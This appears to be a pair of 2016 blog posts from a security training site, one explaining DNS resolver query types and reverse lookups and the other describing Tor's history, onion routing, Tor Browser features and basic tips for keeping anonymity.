The client side of the DNS is called a DNS resolver. A resolver is responsible for initiating the sequencing the queries that ultimate lead to a full resolution of resource sought. An Individual DNS query may be either non-recursive, or iterative or a combination of all these. For the non-recursive query method, a DNS resolver client queries a DNS server that provides a record for a domain for which it is authoritative itself, or it provides a partial result without querying other servers. In case of a caching DNS resolver, the non-recursive query of its local DNS cache delivers a result and reduces the load on upstream DNS servers by caching DNS request records for a period of time after an initial response from upstream DNS servers. For the recursive query approach, a DNS resolver client will query a single DNS server, which may then query ex rel. (as a client itself) other DNS servers as needed. For the iterative query procedure, a DNS resolver client will query a chain of one or more DNS servers. Each server will refer the client to the next server in the chain, until the current server can fully resolve the request

iterative dns query


Reverse Lookup

A reverse lookup is a query of the DNS for domain names when the IP address is known. Multiple domain names may be associated with an IP address. The DNS stores IP addresses in the form of domain names as specially formatted names in pointer (PTR) records within the infrastructure top-level domain ARPA.

Author : cialfor

Updated : 9/26/2016



TOR is an anonymizer operated by a group of volunteer that allows people to improve their privacy and security on the internet. Tor use series of virtual tunnels rather than making a direct connection, thus allowing both organization and individual to share information over public networks without compromising their privacy. It’s also give user to access block destination or content. The name Tor is an acronym derived from the original software project name “The Onion Router”.


The onion router was developed in mid -1990s by “ United States Naval Research Laboratory” employees , mathematician Paul Syverson and computer scientists Michael G.Reed and David Goldschlag , for protecting U.S. intelligence . In December 2006, Dingledine, Mathewson and five others founded The Tor Project, a Massachusetts-based 501(c)(3) research-education nonprofit organization responsible for maintaining Tor. The EFF acted as The Tor Project’s fiscal sponsor in its early years, and early financial supporters of The Tor Project included the U.S. International Broadcasting Bureau, Internews, Human Rights Watch, the University of Cambridge, Google, and Netherlands-based Stichting NLnet.

How Tor Work?

The Tor software protects user by bouncing their communications around a distributed network of relays run by volunteers all around the world. It prevents somebody watching user internet connection from learning what sites user visit, it prevents the sites user visit from learning user physical location , and its also give user access to the sites which are blocked

Tor browser
How tor works?

Originating traffic

A Tor user’s SOCKS-aware applications can be configured to direct their network traffic through a Tor instance’s SOCKS interface. Tor periodically creates virtual circuits through the Tor network through which it can multiplex and onion-route that traffic to its destination. Once inside a Tor network, the traffic is sent from router to router along the circuit, ultimately reaching an exit node at which point the clear text packet is available and is forwarded on to its original destination. Viewed from the destination, the traffic appears to originate at the Tor exit node.

tor browser working

Features of Tor Browser

  • Cross Platform Availability. i.e., this application is available for Linux, Windows as well as Mac.
  • Complex Data encryption before it it sent over Internet.
  • Automatic data decryption at client side.
  • It is a combination of Firefox Browser + Tor Project.
  • Provides anonymity to servers and websites.
  • Makes it possible to visit locked websites.
  • Performs task without revealing IP of Source.
  • Capable of routing data to/from hidden services and application behind firewall.
  • Portable – Run a pre-configured web browser directly from the USB storage Device. No need to install it locally.
  • Available for architectures x86 and x86_64.
  • Easy to set FTP with Tor using configuration as “socks4a” proxy on “localhost” port “9050”
  • Tor is capable of handling thousands of relay and millions of users.


Some Instruction For Using Tor Successfully

  • Use the Tor Browser – Tor does not provide safety to all of the Internet traffic when you run it.
  • Tor only protects your applications that are properly configured to send their Internet traffic through Tor.
  • It is configured to protect your privacy and anonymity on the web as long as you are browsing with the Tor Browser.
  • Don’t torrent over Tor – Torrent file-sharing applications ignore proxy settings and make direct connections even when they are told to use Tor.
  • Even if your torrent application connects only through Tor, you will often send out your real IP address in the tracker GET request, because that’s how torrents work.Don’t enable or install browser plugins(Can harm your anonymity)The Tor Browser will block browser plugins such as Flash, RealPlayer, QuickTime, and others: they can be manipulated into revealing your IP address.Similarly, we do not recommend installing additional add-ons or plugins into the Tor Browser, as these may bypass Tor or otherwise harm your anonymity and privacy.

Author : cialfor

Updated : 9/26/2016


Image credit to